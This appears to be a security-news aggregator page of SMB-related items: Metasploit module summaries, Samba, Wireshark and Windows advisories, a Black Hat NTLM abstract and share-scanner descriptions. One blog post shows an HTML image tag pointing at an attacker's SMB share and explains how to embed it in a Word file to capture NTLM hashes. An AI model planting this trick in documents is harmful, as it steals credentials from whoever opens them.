59 items tagged "smb"
Related tags: packet, memory corruption, remote, txt, smb service, service vulnerability, proof of concept, denial of service, client pool, buffer overflows, snort, smb shares, smb client, sambascan, public shares, network, lan, host, dsa, dce rpc, bug, broadcast messages, beta, based buffer overflow, vista, validation code, usa, sys driver, stack overflow, smb2, server, release candidates, pool overflow, null pointer, nmb, network traffic analyzer, nego, microsoft smb, mdvsa, master browser, mandriva linux, mac, local area network, kernel stack, hangup, dissector, crash proof, authentication mechanisms, authentication mechanism, agustin azubel, advisory updates, microsoft, windows, unauthorized access, stack buffer, smb share, smb server, size pool, side, share, service, safer use, root privileges, protocol, outlook, office document, nonce, netware, negotiate, multiple, microsoft outlook, message size, message, memory location, memory allocation, ipmi, html, glsa, gentoo linux security, exhaustion, dos windows, denial of service attacks, daintree, client response, client message, client kernel, client, capture server, buffer overflow vulnerability, arp spoofing, Pentesting, vulnerability, microsoft windows, code execution, samba
18:32 - Packet Storm Security Exploits
This Metasploit module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result in a stack-based buffer overflow when a specially crafted packet is sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.
21:46 - Carnal0wnage
Someone asked me how to embed an HTML link to an SMB share into a Word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...
In Office 2010, when I'd go to pull a picture into the document by adding a picture from a network share, the picture would become part of the doc and would not be retrieved every time the document opened. The solution was to add some HTML to the document.
I ended up adding the following code to the Office document (replace "[" or "]" with "<" or ">"):
[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
width=1 height=1][/body][/html]
Once that is done, go to Insert --> Object --> Text from File --> select your HTML file.

Once that is done, save and open the document. If all is well you'll see the SMB requests to the network share you specified, and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods... I do realize the LM hashes are missing from the smb capture screenie (disabled on Windows 7?) but I was too lazy to install Office on a VM just for the screenshot.


If this doesn't work for anyone, let me know.
10:45 - SecDocs
Authors: Agustin Azubel, Hernan Ochoa
Tags: Windows NTLM
Event: Black Hat USA 2010
Abstract: In February 2010, we found a vulnerability in the SMB NTLM Windows Authentication mechanism that has been present in Windows systems for at least 14 years (from Windows NT 4 to Windows Server 2008). You probably haven't heard about this vulnerability, but basically the authentication mechanism used by all Windows systems to access remote resources using SMB was flawed, allowing attackers to get read/write access to remote resources and remote code execution without credentials, using different techniques such as passive replay attacks, active collection of duplicate challenges/responses, and prediction of challenges. This vulnerability is also a good example of flaws found in challenge-response authentication mechanisms. This presentation will describe the vulnerability in detail, including its scope and severity, explain different techniques to exploit the flaws found and demo fully functional exploit code.
13:12 - Packet Storm Security Recent Files
Sambascan2 allows you to search an entire network or a number of hosts for SMB shares. It will also list the contents of all public shares that it finds. The difference between sambascan2 and other SMB viewers and scanners is that it will search everything using TCP/IP, and it will not send a lot of broadcast messages, so it can be used across LAN boundaries. It only uses SMB to list the shares and their contents.
13:01 - Packet Storm Security Tools
NMB Scanner scans the shares of an SMB network using the NMB and SMB protocols. It is useful for acquiring information on a local area network for purposes such as security auditing. It can obtain information such as the NMB/SMB/Windows hostname, IP address, IP hostname, Ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the host lists maintained by master browsers.
19:02 - Packet Storm Security Recent Files
Debian Linux Security Advisory 2066-1 - Several remote vulnerabilities have been discovered in the Wireshark network traffic analyzer. It was discovered that null pointer dereferences, buffer overflows and infinite loops in the SMB, SMB PIPE, ASN1.1 and SigComp dissectors could lead to denial of service or the execution of arbitrary code.
22:01 - Packet Storm Security Advisories
Debian Linux Security Advisory 2061-1 - Jun Mao discovered that Samba, an implementation of the SMB/CIFS protocol for Unix systems, does not properly handle certain offset values when processing chained SMB1 packets. This enables an unauthenticated attacker to write to an arbitrary memory location, making it possible to execute arbitrary code with root privileges or to perform denial of service attacks by crashing the Samba daemon.
22:00 - Packet Storm Security Advisories
Gentoo Linux Security Advisory 201006-5 - Multiple vulnerabilities were found in Wireshark, in the Daintree SNA file parser and in the SMB, SMB2, IPMI, and DOCSIS dissectors. Versions less than 1.2.8-r1 are affected.
20:00 - Packet Storm Security Advisories
A vulnerability exists in the SMB client of Microsoft Windows 7 and Windows Server 2008 R2. This vulnerability allows an attacker to trigger a kernel stack overflow by sending a specific SMB_COM_TRANSACTION2 response. Attacking the SMB client can be achieved by convincing a user to connect to a malicious SMB server. Alternatively, the attacker could attempt man-in-the-middle attacks (such as ARP spoofing, NBNS packet spoofing, etc.) to redirect legitimate SMB connections to a malicious SMB server. Successful exploitation of this issue may result in remote code execution with kernel privileges.
21:49 - SecuriTeam
An unauthenticated remote attacker without any kind of credentials can access the SMB service under the credentials of an authorized user.
11:00 - Packet Storm Security Recent Files
This Metasploit module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
21:00 - Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2010-031 - This advisory updates Wireshark to version 1.0.11, which fixes the following issues: the SMB and SMB2 dissectors could crash; the Infiniband dissector could crash on some platforms; several buffer overflows were discovered and fixed in the LWRES dissector.